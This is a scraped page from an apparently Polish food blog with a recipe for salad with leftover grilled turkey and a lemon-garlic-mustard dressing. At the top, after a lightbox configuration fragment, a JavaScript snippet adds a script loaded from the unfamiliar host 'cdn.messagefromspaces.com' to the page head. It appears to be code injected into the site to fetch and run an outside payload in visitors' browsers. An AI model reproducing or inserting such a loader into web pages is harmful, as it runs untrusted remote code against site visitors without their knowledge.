, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

sałatka z grillowanym indykiem

pojawia się zwykle przy nadmiarze grillowanego mięsa drobiowego, tym razem zostały mi 4 indycze sznycle z poprzedniego obiadu. Zatem ciach! do sałatki:)

Składniki sałatki:

  • sałata lodowa
  • pomidor
  • 2 ogórki
  • puszka kukurydzy konserwowanej
  • kiełki rzodkiewki
  • posiekany koperek

sos:

  • sok z całej cytryny
  • oliwy nieco więcej niż soku z cytryny
  • 2 łyżeczki cukru
  • łyżeczka musztardy
  • sól i pieprz do smaku
  • ząbek czosnku przeciśnięty przez wyciskarkę

 

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony